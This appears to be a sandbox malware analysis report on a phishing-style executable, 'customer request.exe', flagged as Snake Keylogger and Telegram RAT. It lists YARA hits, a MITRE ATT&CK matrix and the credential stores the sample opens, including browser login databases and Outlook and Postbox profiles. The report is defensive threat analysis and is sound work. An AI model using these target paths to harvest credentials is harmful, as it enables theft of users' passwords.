Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Queries volume information: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\customer request.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4137608364.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4137995845.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4137995845.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4137608364.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4133955446.000000000041A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4137608364.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4137995845.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tjvxuavKFXO.exe PID: 7488, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tjvxuavKFXO.exe PID: 7488, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\customer request.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4133955446.000000000041C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tjvxuavKFXO.exe PID: 7488, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4137608364.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4137995845.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4137995845.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4137608364.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4133955446.000000000041A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4137608364.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4137995845.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tjvxuavKFXO.exe PID: 7488, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tjvxuavKFXO.exe PID: 7488, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	31 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	1 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report customer request.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
customer request.exe